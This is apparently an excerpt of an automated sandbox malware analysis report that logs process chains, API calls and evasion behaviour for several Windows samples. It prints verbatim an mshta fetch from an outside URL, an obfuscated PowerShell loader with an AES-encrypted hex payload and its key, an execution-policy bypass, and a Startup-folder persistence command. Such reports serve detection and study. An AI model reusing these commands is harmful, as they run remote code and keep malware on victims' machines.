Source: C:\Users\Public\Guard.exeCode function: 30_2_003B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,30_2_003B4005
Source: C:\Users\Public\Guard.exeCode function: 30_2_003B494A GetFileAttributesW,FindFirstFileW,FindClose,30_2_003B494A
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,30_2_003BC2FF
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BCD14 FindFirstFileW,FindClose,30_2_003BCD14
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,30_2_003BCD9F
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,30_2_003BF5D8
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,30_2_003BF735
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,30_2_003BFA36
Source: C:\Users\Public\Guard.exeCode function: 30_2_003B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,30_2_003B3CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B44005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_00B44005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4494A GetFileAttributesW,FindFirstFileW,FindClose,35_2_00B4494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,35_2_00B4C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,35_2_00B4CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4CD14 FindFirstFileW,FindClose,35_2_00B4CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_00B4F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_00B4F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B4FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,35_2_00B4FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B43CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_00B43CE2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CD1D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,19_2_00007FF656CD1D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: mshta.exe, 00000004.00000003.2409415921.0000022336CE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2416807738.0000022336CE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403041983.0000022336CE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403505478.0000022336C4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2416251856.0000022336C4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3392912200.0000016D6AE55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3389923475.0000016D6582B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 0000001C.00000002.2573231231.00000281CBA8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000022.00000002.2605290084.0000017021492000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}p
Source: powershell.exe, 00000008.00000002.2394122505.000001BE28102000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004611000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 00000023.00000002.3398798331.0000000003F65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 0000001C.00000002.2573231231.00000281CBA49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
Source: C:\Users\Public\Guard.exeAPI call chain: ExitProcess graph end nodegraph_30-97676
Source: C:\Users\Public\Guard.exeAPI call chain: ExitProcess graph end nodegraph_30-97748
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D40A00 BlockInput,19_2_00007FF656D40A00
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CB37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_00007FF656CB37B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CD5BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,19_2_00007FF656CD5BC0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D47634 LoadLibraryA,GetProcAddress,19_2_00007FF656D47634
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D1D780 GetProcessHeap,HeapAlloc,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CreateThread,19_2_00007FF656D1D780
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CD57E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF656CD57E4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CD59C8 SetUnhandledExceptionFilter,19_2_00007FF656CD59C8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CF8FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF656CF8FE4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CEAF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF656CEAF58
Source: C:\Users\Public\Guard.exeCode function: 30_2_0037A354 SetUnhandledExceptionFilter,30_2_0037A354
Source: C:\Users\Public\Guard.exeCode function: 30_2_0037A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_0037A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B0A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00B0A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B0A354 SetUnhandledExceptionFilter,35_2_00B0A354

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonlyJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D1CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,19_2_00007FF656D1CE68
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CB37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_00007FF656CB37B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D29420 SendInput,keybd_event,19_2_00007FF656D29420
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2D1A4 mouse_event,19_2_00007FF656D2D1A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANHJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($pzaMyJg){return -split ($pzaMyJg -replace '..', '0x$& ')};$KUtXL = clean('78219AD4FAFD1313B3312ABC82CE34A02A4A60C02EBEBF66EF22D1AE9E38EAB935975C5E265945ACF8F43EA3217D7E04446B93E8935F8A650373163DF23D9095D2EE36D9AE183830DA3383A93777009FFE992C94365431E85C9A4BD19706DE0F651039764F10D911FF62FC644C72D4568DEB22276F734D73AB4E6A18097DC3C4C7480CFE127D41CB49FF2295F7E03078C98E7DBADDD24DD3982D0786BCE84A387192B080A130BF4762AFEFC2CE03F92D6FBB6AEA0B223A2119ABFE11214C698E82BE06E8F9B342CD1C7F089050675451B7455B935BA443206FDCD04C4D942F4620687D61DCE7B4896DF4982AD1CAA4709913A3BFBA7868829327FE80430B6CFF032AFE6E144EA3B7EEEB9B1ED8A7D2EE845D26410B8D045FB1A5B3BF8A7AB9BB3E0D066452978BBC7F125835600824DDDC81D38A5209F1A4091DD7B7C1D04307CA0FB5F05575A79F927FE51C241234BD04F89918070EE2E5287BE446F1920BF8A252AD8998C544A249048AF75DB89D6D0B6A8AD543DEEB0889D275BCB8B92841DAD4290E2DC88D65C9630CC47CCD6F299BB0BED9C404CBD5A82ADE61B6393BD1C517406CEC6BBF66E379EEFE6CAB17ABC4FE3B95CD7AFF7FC1DDD9A920A6191FB37C8EC30A4A7667A113B678672013F0BABB0C4B9F43C87FC854B2E47772CACC37D2ADF2664824AF9C4DB947633D07DD47E03C0BD686B11FD76ABC45F1D4050F3E57080C852D506F56B49340243D2E73DD50FA076F63A84BC99C7519ADC821AC6311B2CEDD59508884AE75F53F4A78FF89CC03F899651C73F3989A11092A199BD1AA8DCCA27B2B7D39A6A8A8A1E91E34A26196775ACBEADB106D5F827D0A5A5B44D891E4B333CA7F6AFDC7725D5BD9CEC0B11138E8AB3AFBEEE6D44F83D151C14A67A3497E17312DF7AB7BD3DCB1D33AC9AA0402ED89756C4B881508E863BE482E8AEFB806649D738E7DCE2814888C8EE1E5F0C849829B3A00AA1A7EF6E1C6498222EC93BF8FED737DE9D7576AFAE854850BFF492E80199552DDEF0675B892B327717CB5AF4CFFBB1A5D7C623A2768AA32CC72FBCA150EC0786993E294FA0F154E9A90E9394DC84E513BB54ED63CDE8CDDBDAE0AC392E93E0A5AF01CFE86C53D9F595CED51532CB14F4D98D7FCD5EF8B286785CABB97B5793CDFDC9D05F90353B05939CAC7A6F8938A1073C7190ED1E372A484F1764DEAAC0CB173B868C0330983DCADEB563002EE18FDD0662F1117381739EC36C7AC7F333B3D0F9883A3875F9AD6194D6264748161A5E8FC943C8D9CC7F4F4CC6DFFC926B8CB32A52C8CE0BBCD0CC4E6128DEFB5ECED7F3A9786CB2F36C6B53B84C319FA011D47CD55D4FC3A8BFD9BBD84A9736B1122314172FB69B308F5380A65BD8E70E37A3C3660FAB16D1CA3609ED74F25793CB21D2C45B081D8E2F72DCDDBE269188B42541A2D5FE30CBDAE1EA3E31418FACA2F5448EECBFD69D9231F9C19ABC5BE36A8776A1319460EE488396DDC19905B1F4A80C52596B85B2B0BFA14FED4C0AEC8366A87710B144BAA0ECA013BF68B764FD59CF871FAE15AFAFE6A3E29CF3BEDEFDDF29675BB14D585BB959E86034C7525C3572536DCCFC109FA80925932BA43B5436E89F7BFE06F033C54CF7252EE9FF9C4C977EDE18AC548BD5F848B384D44C8DC955EF7A663E276183DB51D3513687F1D7D1B10B0B09043B0D2D9110AFA20C03738F1593BB49422FF1EDE5B067366BB176DAC56DF968F791A5FADF7F8C994C4EE8E99902C57B90344E31873504C3C9DA5D1A07DB9ECF1');$IiqxjTB = [System.Security.Cryptography.Aes]::Create();$IiqxjTB.Key = clean('747464414A50546B43514F4F4B7A5077');$IiqxjTB.IV = New-Object byte[] 16;$UdJKkrroG = $IiqxjTB.CreateDecryptor();$mhREwMEES = [Text.Encoding]::UTF8.GetStringJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\user\AppData\Roaming\New_2025.webpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function clean ($pzamyjg){return -split ($pzamyjg -replace '..', '0x$& ')};$kutxl = clean('78219ad4fafd1313b3312abc82ce34a02a4a60c02ebebf66ef22d1ae9e38eab935975c5e265945acf8f43ea3217d7e04446b93e8935f8a650373163df23d9095d2ee36d9ae183830da3383a93777009ffe992c94365431e85c9a4bd19706de0f651039764f10d911ff62fc644c72d4568deb22276f734d73ab4e6a18097dc3c4c7480cfe127d41cb49ff2295f7e03078c98e7dbaddd24dd3982d0786bce84a387192b080a130bf4762afefc2ce03f92d6fbb6aea0b223a2119abfe11214c698e82be06e8f9b342cd1c7f089050675451b7455b935ba443206fdcd04c4d942f4620687d61dce7b4896df4982ad1caa4709913a3bfba7868829327fe80430b6cff032afe6e144ea3b7eeeb9b1ed8a7d2ee845d26410b8d045fb1a5b3bf8a7ab9bb3e0d066452978bbc7f125835600824dddc81d38a5209f1a4091dd7b7c1d04307ca0fb5f05575a79f927fe51c241234bd04f89918070ee2e5287be446f1920bf8a252ad8998c544a249048af75db89d6d0b6a8ad543deeb0889d275bcb8b92841dad4290e2dc88d65c9630cc47ccd6f299bb0bed9c404cbd5a82ade61b6393bd1c517406cec6bbf66e379eefe6cab17abc4fe3b95cd7aff7fc1ddd9a920a6191fb37c8ec30a4a7667a113b678672013f0babb0c4b9f43c87fc854b2e47772cacc37d2adf2664824af9c4db947633d07dd47e03c0bd686b11fd76abc45f1d4050f3e57080c852d506f56b49340243d2e73dd50fa076f63a84bc99c7519adc821ac6311b2cedd59508884ae75f53f4a78ff89cc03f899651c73f3989a11092a199bd1aa8dcca27b2b7d39a6a8a8a1e91e34a26196775acbeadb106d5f827d0a5a5b44d891e4b333ca7f6afdc7725d5bd9cec0b11138e8ab3afbeee6d44f83d151c14a67a3497e17312df7ab7bd3dcb1d33ac9aa0402ed89756c4b881508e863be482e8aefb806649d738e7dce2814888c8ee1e5f0c849829b3a00aa1a7ef6e1c6498222ec93bf8fed737de9d7576afae854850bff492e80199552ddef0675b892b327717cb5af4cffbb1a5d7c623a2768aa32cc72fbca150ec0786993e294fa0f154e9a90e9394dc84e513bb54ed63cde8cddbdae0ac392e93e0a5af01cfe86c53d9f595ced51532cb14f4d98d7fcd5ef8b286785cabb97b5793cdfdc9d05f90353b05939cac7a6f8938a1073c7190ed1e372a484f1764deaac0cb173b868c0330983dcadeb563002ee18fdd0662f1117381739ec36c7ac7f333b3d0f9883a3875f9ad6194d6264748161a5e8fc943c8d9cc7f4f4cc6dffc926b8cb32a52c8ce0bbcd0cc4e6128defb5eced7f3a9786cb2f36c6b53b84c319fa011d47cd55d4fc3a8bfd9bbd84a9736b1122314172fb69b308f5380a65bd8e70e37a3c3660fab16d1ca3609ed74f25793cb21d2c45b081d8e2f72dcddbe269188b42541a2d5fe30cbdae1ea3e31418faca2f5448eecbfd69d9231f9c19abc5be36a8776a1319460ee488396ddc19905b1f4a80c52596b85b2b0bfa14fed4c0aec8366a87710b144baa0eca013bf68b764fd59cf871fae15afafe6a3e29cf3bedefddf29675bb14d585bb959e86034c7525c3572536dccfc109fa80925932ba43b5436e89f7bfe06f033c54cf7252ee9ff9c4c977ede18ac548bd5f848b384d44c8dc955ef7a663e276183db51d3513687f1d7d1b10b0b09043b0d2d9110afa20c03738f1593bb49422ff1ede5b067366bb176dac56df968f791a5fadf7f8c994c4ee8e99902c57b90344e31873504c3c9da5d1a07db9ecf1');$iiqxjtb = [system.security.cryptography.aes]::create();$iiqxjtb.key = clean('747464414a50546b43514f4f4b7a5077');$iiqxjtb.iv = new-object byte[] 16;$udjkkrrog = $iiqxjtb.createdecryptor();$mhrewmees = [text.encoding]::utf8.getstringJump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D1C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_00007FF656D1C858
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D1D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,19_2_00007FF656D1D540
Source: powershell.exe, 00000008.00000002.2347436380.000001BE20956000.00000004.00000800.00020000.00000000.sdmp, PefjSkkhb.exe, 00000013.00000000.2298099515.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp, Guard.exe, 0000001E.00000003.2439143400.00000000051A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PefjSkkhb.exe, Guard.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CEFD20 cpuid 19_2_00007FF656CEFD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
